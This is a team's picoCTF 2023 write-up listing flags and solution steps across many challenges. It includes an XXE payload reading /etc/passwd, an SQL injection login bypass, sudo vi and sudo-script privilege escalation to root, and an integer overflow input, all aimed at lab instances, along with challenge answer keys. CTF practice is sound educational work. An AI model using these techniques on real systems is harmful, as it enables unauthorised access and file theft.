# picoCTF 2023 Competition
Team HejTozBorci
interloper69, jjindra93, OlinK, Zihuatanejo
## General
### money-ware
>flag: picotCTF{Petya}
### repetitions
>flag: picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_c0ac1752}
### Rules 2023
>flag: picoCTF{h34rd_und3r5700d_4ck_cba1c711}
### Permissions
>flag: picoCTF{uS1ng_v1m_3dit0r_021d10ab}
steps:
1. Run the instance and connect+login to the server
2. Search the server folder hierarchy
- ls (nothing)
- cd ..
- cd ..
- ls
- we can see the ROOT folder
- we are not permitted to enter the folder
3. Hint 'What permissions do you have?'
- whoami
- id
- sudo -l
- 'User picoplayer may run the following commands on challenge:
(ALL) /usr/bin/vi'
- lets try that
4. VIM
- https://gtfobins.github.io/
### chrono
>flag: picoCTF{Sch3DUL7NG_T45K3_L1NUX_7754e199}
Task is "How to automate tasks to run at intervals on linux servers?" - done with Cron, so the task is going to be to find crontab or related
steps:
- start server & login via ssh
- ssh picoplayer@saturn.picoctf.net -p55006
- whoami, ls -la and the usual shenanigans
- cd to /etc/ and cat crontab
- BAM, got yo flag
### useless
>flag: picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_5562}
steps:
1. start instance & login via ssh
- ssh picoplayer@saturn.picoctf.net -p 65074
2. Explore folders and script
- ls
- cat useless
- we have to read the script manual to obtain the flag
3. Obtain the flag
- man useless
### Special
flag:
The spell-checking shell blocks and/or corrects most of the shell commands so they're not able to execute, however the following cmds return a relevant value:
``whoami`` in double backticks or single quotes.
``awk`` is accepted as well
``grep`` is accepted as well
### Specialer
>flag: picoCTF{y0u_d0n7_4ppr3c1473_wh47_w3r3_d01ng_h3r3_38f5cc78}
Ugh, finally did it.
1. ssh in
2. notice that tabbing (hitting the TAB on keyboard) displays autocomplete, ~ls, but cat isn't allowed
3. `bla=$(<ala/kazam.txt) && echo $bla` to store and then read the file content
## Forensics
### PcapPoisoning
>flag: picoCTF{P64P_4N4L7S1S_SU55355FUL_dd89e21b}
steps:
1. download given file && open in Wireshark
2. Analyze -> Conversations
2a. 5 IPv4 conversations
2b. Only one of them sends real data (bits) from A -> B
2c. Right click on this conversation -> Apply as Filter -> Selected -> A<->B
3. Find the flag
### hideme
>flag: picoCTF{Hiddinng_An_imag3_within_@n_ima9e_5cf64968}
### who is it
>flag: picoCTF{WilhelmZwalina}
steps:
1. download given file && open terminal
2. strings email-export.eml
3. Find the original sender IP address on any of these 4 places
3a. ARC-Authentication
3b. Received
3c. Received-SPF
3d. Authentication-Results
4. whois 173.249.33.206
5. person: Wilhelm Zwalina
### FindAndOpen {WIP}
>flag: picoCTF{R34DING_LOKd_fil56_succ3ss_8ec01288}
steps:
1. download given zip + pcap files && open dump.pcap in Wireshark
2. search packets for hints:
+ "Flying on Ethernet secret: Is this the flag",
+ "Could the flag have been splitted?"
+ base64 encoded "This is the Secret: "picoCTF{R34DING_LOKd_" (packet 48)
3. open the zip file /w string: picoCTF{R34DING_LOKd_ to get access to archive & to obtain the flag
### MSB
>flag: picoCTF{15_y0ur_que57_qu1x071c_0r_h3r01c_b5e03bc5}
steps:
- after banging our heads for 2 hours and figuring out why the seventh bit is interesting Zihuatanejo peeked onto Discord to find a hint from other users -> sigbits
- download sigbits.py
- open console and run the following:
- python sigbits.py -t=msb -o=rgb -out=output.txt -e=column Ninja-and-Prince-Genji-Ukiyoe-Utagawa-Kunisada.flag.png
- cat output.txt && search "ctf"
- somehow grepping did not work for me, it displayed the whole content of the file
### Invisible WORDs
>flag:
steps:
1. download given file && open terminal
2. Hint 2: "How's the image quality?"
- foremost -i output.bmp
- 1 MB Size, Resolution 960x540
- binwalk, strings, zsteg ... nothng
## Reverse Engineering
### Reverse
>flag: picoCTF{3lf_r3v3r5ing_succe55ful_fe733618}
steps:
1. download given file && open terminal
2. strings ret
3. flag is in the upper part
### Safe Opener 2
>flag: picoCTF{SAf3_0p3n3rr_y0u_solv3d_it_d6afee27}
steps:
1. download given file && open terminal
2. strings SafeOpener.class
3. flag is in the middle part
### timer
>flag: picoCTF{t1m3r_r3v3rs3d_succ355fully_17496}
steps:
1. download given file && open terminal
2. Analyze it using mobsf tool
- run mobsf
- import timer.apk
- Android version name: the flag...
### Ready Gladiator 0
>flag: picoCTF{h3r0_t0_z3r0_4m1r1gh7_e1610ed2}
steps:
1. download given file && open terminal
2. run the app using command: nc saturn.picoctf.net 50612 < imp.red
3. As we can see, we automatically lost
- we have to change the file somehow to obtain win of the warrior to obtain flag
4. Change the imp.red file
- change the value of 'mov' parameter
- for example to: 0,10 or 5,1
5. Run the app again with changed parameter to obtain the flag..
 -> 
### Ready Gladiator 1
>flag: picoCTF{1mp_1n_7h3_cr055h41r5_441be1fc}
steps:
1. download given file && open terminal
2. run the app using command: nc saturn.picoctf.net 50612 < imp.red
3. As we can see, we automatically lost
- we have to change the file somehow to obtain win of the warrior to obtain flag
4. Change the imp.red file
- changing only mov values doesnt work here
- Hint says we should read beginner documentation to the CoreWars game
- https://corewar-docs.readthedocs.io/en/latest/corewar/warriors/
5. Lets edit the parameters of the imp.red file by the documentation
- add #4, 3
mov 2, @2
jmp -2
dat #10, #5
- run the app to obtain the flag..
 -> 
### Ready Gladiator 2
>flag:
steps:
1. download given file && open terminal
2. run the app using command: nc saturn.picoctf.net 50612 < imp.red
3. As we can see, we automatically lost
- we have to change the file somehow to obtain win of the warrior to obtain flag
4. Change the imp.red file
### Virtual Machine 0
>flag:
1. download given files && open terminal
2. unzip and cat input.txt -> file is Virtual-Machine-0.dae, collada project which can be opened in any
3. open in any 3d app (blender -> file -> import -> Collada (.dae))
4. 3d model is a lego black box 
## Cryptography
### rotation
>flag: picoCTF{r0tat1on_d3crypt3d_7ecd1c61}
steps:
1. https://www.dcode.fr/rot-cipher
2. input roted text: xqkwKBN{z0bib1wv_l3kzgxb3l_7mkl1k61}
3. Decrypt
4. search page for string "picoCTF"
### ReadMyCert
>flag: picoCTF{read_mycert_7834c5f2}
steps:
1. download given file && open terminal
2. cat readmycert.csr
3. copy the certificate request (base64 long string)
4. https://gchq.github.io/CyberChef/
5. recipe: From Base64
### HideToSee
>flag: picoCTF{atbash_crack_7142fde9}
steps:
1. download given file
2. binwalk, strings, zsteg...no output, only picture
3. stegseek tool
- stegseek atbash.jpg /usr/share/wordlists/rockyou.txt
- cat atbash.jpg.out
- krxlXGU{zgyzhs_xizxp_4v847zx1}
- decode it using atbash cipher (https://www.dcode.fr/atbash-cipher)
## Web Explotation
### findme
>flag: picoCTF{proxies_all_the_way_c4dbc2d6}
steps:
1. start instance and go to the website
2. login with given credentials (test, test!)
- nothing useful, search bar has nothing inside by inspecting F12
3. login again, but with BurpSuite
- Referer ID is the first part of flag and redirect to the page ID is second part of flag in some base64 value
- decoded value: picoCTF{proxies_all_the_way_01e748db}
### MatchTheRegex
>flag: picoCTF{succ3ssfully_matchtheregex_36f43841}
steps:
1. start instance and go to the website
2. website consists jus of a title, text field input and submit button
3. inspect the code (F12)
- Debugger -> index
- by reading the code we can see the vulnerability
- if we enter the "name" of the website - its title, we obtain correct response
4. enter "picoCTF" to obtain the flag
### More SQLi
>flag: picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_62aa7500}
steps:
1. start instance and go to the website
2. open Burp Suite and route the traffic with a proxy (eg. FoxyProxy)
3. login on the website as:
- username: test
- password: test
4. navigate to Burp Suite, select the POST request with the credentials above and send them to the repeater
5. construct an sql injection starting with adding "' OR 1=1 --" to the password part
voila, the flag is in the response
### SOAP
>flag: picoCTF{XML_3xtern@l_3nt1t1ty_55662c16}
steps:
1. start instance and go to the website
2. Run burp suite and turn on proxy to filter all traffic through it
3. Select the article links on the website and observe the changing POST requests
4. Send the request to burp's repeater and modify the payload to the following:
```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data><ID>
&xxe;
</ID></data>
```
voila, there you go
learn more about XXE on [Portswigger](https://portswigger.net/web-security/xxe)
### Java Code Analysis!?! {WIP}
>flag:
the goal is to read the flag book but it requires admin access
1. start instance and navigate to the website,
2. start Burp Suite and route the traffic with proxy (eg. FoxyProxy)
3. login as user:user,
4. examine the book posts
5. json web token
## Binary Exploitation
### two sum
>flag: picoCTF{Tw0_Sum_Integer_Bu773R_0v3rfl0w_4b563da7}
steps:
1. Run the instance && download given source file
2. Connect to the given IP via terminal
3. Inspect the source code of the app
- we have to obtain both num1 and num2 > 0, but there is only =0 and =-1 defined
- lets overflow the int values
- according in C the maximum size of a signed int is INT_MAX = 2147483647
4. Run the app in terminal and enter num1 and num2 value: 2147483647
### babygame01 {WIP}
>flag:
steps:
1. Run the instance && run the game with nc saturn.picoctf.net <port>
2. map, by entering w/a/s/d you can move as a @, goal is to get to the X at position 29 89
3. strings game
- there is flag.txt file
- many useful commands to use, lets try them
4. run the game and try:
- print flag (gets us to the end automatically)
- print flag.txt (now working, same as previous)
-
5. Disassembly the game file
- open it in Ghidra
- inspect the functions
- _fini function works with flag.txt file
- address: 0804a00a
// babygame0 and babygame1 differs in "print_flag_status"
### hijacking
>flag:
steps:
1. Run the instance && run the game with nc saturn.picoctf.net <port>
- ssh picoctf@saturn.picoctf.net -p64707
2. ls, whoami, ls -al
3. sudo -l
- we can run some /home/picoctf/.server.py
- sudo vi .server.py
4. Edit .server.py file
- 
- sudo /usr/bin/python3 /home/picoctf/.server.py
- we obtained root access
5. Search for the flag
- whoami, ls
- cd /root
- ls -al
- cat .flag.txt
Google Drive
Gist
Clipboard
Sign in with Wallet
